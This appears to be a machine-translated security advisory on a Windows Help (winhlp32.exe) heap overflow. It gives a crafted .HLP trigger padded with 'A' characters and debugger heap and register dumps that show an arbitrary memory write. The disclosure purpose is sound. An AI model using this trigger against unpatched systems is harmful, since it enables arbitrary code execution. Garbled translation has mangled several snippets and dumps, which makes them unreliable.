Graph processing heap overflow vulnerability in Microsoft Windows Affected Systems: Microsoft Windows XP SP2 Microsoft Windows XP SP1 Microsoft Windows Server 2003 SP1 Microsoft Windows Server 2003 Microsoft Windows NT Server 4.0 Microsoft Windows 2000sp4 Microsoft Windows 2000sp3 Microsoft Windows 2000sp2 Microsoft Windows 2000sp1 Description: -------------------------------------------------------------------------------- BugTraq ID: 17325 Microsoft Windows is a very popular operating system released by Microsoft. The. HLP File rendering engine of winhlp32.exe has a heap overflow vulnerability. Attackers can embed HTML pages in the. HLP file to trigger this vulnerability, overwrite the memory block, and execute arbitrary commands. Test method: -------------------------------------------------------------------------------- Alert The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk! Take acmsetup. HLP as an example: ... Snip ..... : CW ('main'): FH () : CBB ('btn _ topics ', 'Ns (): Ji ('> Mai N', 'helptopicsbu Tton '): FH (): CS () : FH (): FD () '): SPC (1, 16777215): FH (). ... LP ..... ............... . Z .../.......... ................ ................ ... W.. X... ... 5. '... %... e % ...... 3. @ = ...... ... X .. // Attackers can inject malicious input to trigger this vulnerability: ... Snip ...... : CW ('main'): FH () : CBB ('btn _ topics ', 'Ns (): Ji ('> Mai N', 'helptopicsbu Tton '): FH (): CS () : FH (): FD () '): SPC (1, 16777215): FH (). ... LP ..... ............... . Z .../.......... ... Aaaaaaa Aaaaaaaaaaaaaaaa Aaaaaaaaaaaaaaaa Aaaaaaaaaaaaaaaa Plus 10,000 more After winhlp32.exe opens the. HLP file, the heap status is as follows: Heap[winhlp32.exe]: heap block at 0009b940 modified at 0009b9a2 past requested size of 5a 0: 000> dd 0009b940 0009b940 0005000f 001e0700 4f26001f 41697470 0009b950 41414141 ababababab 41 ababab feeefeee 0009b960 4100 feee 41414141 00040000 41000005 0009b970 554d001b 41002928 41414141 feababab 0009b980 4100 feee 00000000 41060000 41414141 0009b990 6f42001f 416d6b6f 65446b72 416e6966 0009b9a0 41414141 ababababab 41 ababab feeefeee 0009b9b0 4100 feee 00004141 000f0006 feee0400 Heap[winhlp32.exe]: Invalid Address specified to rtlfreeheap (00090000,000 9b948) (728.2f8): Break instruction exception-code 80000003 (first chance) Eax = 0009b940 EBX = 0009b940 ECx = 77f75c17 edX = 0007 ecba ESI = 00090000 EDI = 0009b940 EIP = 77f75a58 ESP = 0007eec4 EBP = 0007eed8 iopl = 0 NV up ei pl nz na PE NC Cs = 001b Ss = 0023 DS = 0023 es = 0023 FS = 0038 GS = 0000 EFL = 00000202 0: 000> dd 0009b948 0009b948 4f26001f 41697470 41414141 abababab 0009b958 41 ababab feeefeee 4100 feee 41414141 0009b968 00040000 41000005 554d001b 41002928 0009b978 41414141 feababab 4100 feee 00000000 0009b988 41060000 41414141 6f42001f 416d6b6f 0009b998 65446b72 416e6966 41414141 abababab 0009b9a8 41 ababab feeefeee 4100 feee 00004141 0009b9b8 000f0006 00230400 000901a8 000901a8 Heap[winhlp32.exe]: heap block at 0009be50 modified at 0009bf54 past requested size of FC 0: 000> dd 0009be50 0009be50 00180023 001c0700 02390006 007a0000 0009be60 00000000 02b30000 00280000 000e0000 0009be70 000d0000 00010000 00000004 00000000 0009be80 00000000 005a0000 00100000 00000000 0009be90 00000000 00000000 80000080 80000000 0009bea0 00800080 00800000 80800080 41410000 0009beb0 41414141 41414141 41414141 41414141 0009bec0 41414141 41414141 41414141 41414141 It can be seen that the tail of the previous block has been overwritten in 0009be54, and the following parts are controlled: 0: 000> dd 0009bf54 0009bf54 41414141 41414141 41414141 41414141 0009bf64 41414141 41414141 41414141 41414141 0009bf74 41414141 41414141 41414141 41414141 0009bf84 41414141 41414141 41414141 41414141 0009bf94 41414141 41414141 41414141 41414141 0009bfa4 41414141 41414141 41414141 41414141 0009bfb4 41414141 41414141 41414141 41414141 0009bfc4 41414141 41414141 41414141 41414141 Because the two pointers can be directly controlled in the heap management structure, it can cover 4 bytes of arbitrary memory: Eax 41414141 ECX 41414141 EdX 0009e5d8 ASCII "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ..." EBX 00090000 ESP 0007f90c EBP 0007fb30 ESI 0009e5d8 ASCII "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ..." EDI 1, 00000068 EIP 77f581bd ntdll.77f581bd Suggestion: -------------------------------------------------------------------------------- Vendor patch: Microsoft --------- Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version: Http://www.microsoft.com/technet/security/ |